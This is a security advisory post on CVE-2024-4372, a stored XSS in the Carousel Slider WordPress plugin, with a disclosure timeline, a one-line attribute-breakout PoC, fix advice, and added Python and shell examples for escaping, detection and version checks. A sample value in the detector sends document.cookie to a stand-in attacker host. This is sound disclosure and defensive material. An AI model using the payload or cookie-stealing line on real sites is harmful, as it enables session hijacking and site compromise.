A recent security assessment of the Carousel Slider WordPress plugin found CVE-2024-4372, a Stored Cross-Site Scripting (XSS) vulnerability in versions before 2.2.11. Because the injected script is saved with the slider and runs in the browser of everyone who views the affected page, it can be used to hijack sessions and compromise the site. In particular, an attacker who has already hijacked an administrator or editor account can plant a JavaScript backdoor in a slider and use it to regain access after the original access is revoked.

Main info:

CVE: CVE-2024-4372
Plugin: Carousel Slider < 2.2.11
Criticality: High
All-time downloads: 914 982
Active installations: 40 000+
Publicly published: April 30, 2024
Last updated: April 30, 2024
Researcher: Dmitrii Ignatyev
OWASP Top 10: A7: Cross-Site Scripting (XSS)
PoC: Yes
Exploit: No
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4372
https://wpscan.com/vulnerability/13dcfd8a-e378-44b4-af6f-940bc41539a4/

Timeline

April 15, 2024: Plugin testing and vulnerability detection in the Carousel Slider plugin have been completed
April 15, 2024: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing it
April 30, 2024: Registered CVE-2024-4372

Discovery of the Vulnerability

During routine testing, security researchers found that a slider field in the Carousel Slider plugin is rendered into the page without escaping. A user who can edit sliders can therefore store a script that runs in the browser of anyone who views the slider, which can lead to account takeover and loss of website integrity.

Understanding Stored XSS attacks

Stored Cross-Site Scripting (XSS) occurs when user-controlled input is saved on the server and later rendered into a page without proper escaping, so the injected script executes in the browser of every user who views that page. In WordPress, plugins are a frequent entry point for such attacks because each one adds its own input fields and output templates to the site.

Exploiting the Stored XSS Vulnerability

Through the vulnerable field, an attacker can embed JavaScript in a slider. The injected event handler fires when a visitor's mouse moves over the rendered slider element, and the script runs in that visitor's session and origin, so it can act on the site as that user.

POC:

Create a new slider and put the following value into the "URL View" field:

1212"onmouseover='alert(1)'

The leading double quote closes the attribute the value is inserted into, and the rest adds an onmouseover handler; hovering over the rendered slider element then runs alert(1).
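To show what the PoC value does once it reaches the page, here is an added example written for this edit; it is not code from the Carousel Slider plugin or from the CleanTalk report. The link template, the escaping helpers and the sample stored values are assumptions standing in for the plugin's real markup; in a WordPress plugin the same roles are played by esc_url() and esc_attr(). The last function is a simple check a responder can run over exported slider settings to spot values that carry an attribute breakout or a script-bearing URL scheme.

```python
"""
Added example (not code from the Carousel Slider plugin or the
CleanTalk post): models how an attribute-context stored XSS like the
one in the PoC works, how output escaping stops it, and how to spot
injected values in stored settings. The template string and the
sample stored values below are constructed for illustration.
"""
import html
import re
from urllib.parse import urlsplit

# PoC payload from the post: the leading double quote closes the
# attribute the value lands in, then an event handler attribute follows.
POC_PAYLOAD = "1212\"onmouseover='alert(1)'"


def render_unescaped(url: str) -> str:
    """Vulnerable (assumed template, not the plugin's real markup):
    the stored value is interpolated into the attribute verbatim."""
    return f'<a href="{url}">slide</a>'


SAFE_SCHEMES = {"http", "https", "mailto", "tel", ""}  # "" = relative URL


def sanitize_url(url: str) -> str:
    """Approximation of what WordPress esc_url() does: keep only
    expected schemes so javascript: and data: links are dropped."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in SAFE_SCHEMES:
        return ""
    return url.strip()


def render_escaped(url: str) -> str:
    """Hardened: validate the URL, then escape for attribute context
    (html.escape with quote=True plays the role of WordPress esc_attr())."""
    return f'<a href="{html.escape(sanitize_url(url), quote=True)}">slide</a>'


# Quote-breakout followed by an on<event>= handler, or a script-bearing scheme.
BREAKOUT = re.compile(r"""["'][^"'<>]*\bon[a-z]+\s*=""", re.IGNORECASE)
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def looks_injected(value: str) -> bool:
    """Detection: flag a stored slider setting that carries an attribute
    breakout with an event handler or a script-bearing URL scheme."""
    return bool(BREAKOUT.search(value) or DANGEROUS_SCHEME.match(value))


# Constructed sample of stored slider URL values (not real site data).
SAMPLE_STORED_VALUES = {
    "slide-1": "https://example.com/landing",
    "slide-2": POC_PAYLOAD,
    "slide-3": "javascript:fetch('https://attacker.invalid/?c='+document.cookie)",
    "slide-4": "/products?ref=spring",
}


def find_injected(values: dict) -> list:
    """Return the keys of all stored values that look injected, sorted."""
    return sorted(k for k, v in values.items() if looks_injected(v))


if __name__ == "__main__":
    print("vulnerable:", render_unescaped(POC_PAYLOAD))
    print("hardened:  ", render_escaped(POC_PAYLOAD))
    print("flagged:   ", find_injected(SAMPLE_STORED_VALUES))
```

Run it directly to see the unescaped and escaped renderings side by side. The detector is deliberately narrow: it looks only for the breakout pattern the PoC uses and for dangerous URL schemes, so it is a triage aid for exported settings, not a replacement for updating the plugin.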


The risk posed by this vulnerability is significant, because a stored script runs with the privileges of whoever views it. When an administrator views the slider, the script can act on the site as that administrator, which is what makes a persistent JavaScript backdoor possible; for ordinary visitors it can steal sensitive data or redirect them to malware. In the worst case, it leads to complete website takeover.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2024-4372 and similar vulnerabilities:

  • Update the Carousel Slider plugin to version 2.2.11 or later, which fixes this issue.
  • Regularly monitor for security updates and apply them promptly.
  • Put a web application firewall (WAF) or security plugin in front of the site to filter requests that carry script payloads; treat this as a stopgap, since it does not fix the missing escaping.
  • Educate website administrators and users about safe browsing practices and the security threats they may face; any account that can edit sliders is enough to plant the payload, so protect those accounts.
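For the first recommendation, the following added script (not part of this post or of the plugin) reports whether an installed Carousel Slider is older than the fixed 2.2.11 release. It assumes the plugin sits at wp-content/plugins/carousel-slider/carousel-slider.php with the usual "Version:" header, uses WP-CLI when it is on the PATH, and expects plain dotted numeric versions.

```shell
#!/bin/sh
# Added example, not a script from the CleanTalk post or from the plugin.
# Reports whether an installed Carousel Slider predates the fixed release.
# Assumptions: the plugin lives under wp-content/plugins/carousel-slider/
# and its main file carousel-slider.php carries a "Version:" header line;
# WP-CLI (wp) is used when available; versions are dotted numerics.

FIXED_VERSION="2.2.11"

# Return 0 (true) when version $1 is strictly lower than version $2.
# Pure-shell comparison so it does not depend on GNU sort -V.
version_lt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        [ "$a" = "$ai" ] && a="" || a="${a#*.}"
        [ "$b" = "$bi" ] && b="" || b="${b#*.}"
        ai="${ai:-0}"; bi="${bi:-0}"
        [ "$ai" -lt "$bi" ] && return 0
        [ "$ai" -gt "$bi" ] && return 1
    done
    return 1
}

# Print "vulnerable" or "patched" for a given installed version string.
carousel_slider_status() {
    if version_lt "$1" "$FIXED_VERSION"; then
        echo vulnerable
    else
        echo patched
    fi
}

# Extract the Version: header from a plugin main file given as $1.
plugin_header_version() {
    sed -n 's/^[[:space:]*]*Version:[[:space:]]*\([0-9][0-9.]*\).*/\1/p' "$1" | head -n 1
}

# Installed version for the WordPress root in $1 (default: current dir):
# ask WP-CLI first, fall back to reading the plugin header.
installed_version() {
    wp_root="${1:-.}"
    if command -v wp >/dev/null 2>&1; then
        wp plugin get carousel-slider --field=version --path="$wp_root" 2>/dev/null && return
    fi
    plugin_header_version "$wp_root/wp-content/plugins/carousel-slider/carousel-slider.php"
}

# Usage: sh check-carousel.sh --check /path/to/wordpress
# (script name is hypothetical)
if [ "${1:-}" = "--check" ]; then
    v="$(installed_version "${2:-.}")"
    [ -n "$v" ] || { echo "Carousel Slider not found" >&2; exit 2; }
    echo "Carousel Slider $v: $(carousel_slider_status "$v")"
fi
```

A non-empty result other than "patched" means the site should be updated before anything else; the version comparison treats a missing trailing component as zero, so 2.2 is reported as vulnerable.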

By addressing Stored XSS vulnerabilities like CVE-2024-4372 proactively, WordPress website owners can improve their security posture and reduce the chance of exploitation. Stay vigilant, stay secure.


DMITRII I.

CVE-2024-4372 – Carousel Slider – Stored XSS to JS backdoor creation – POC
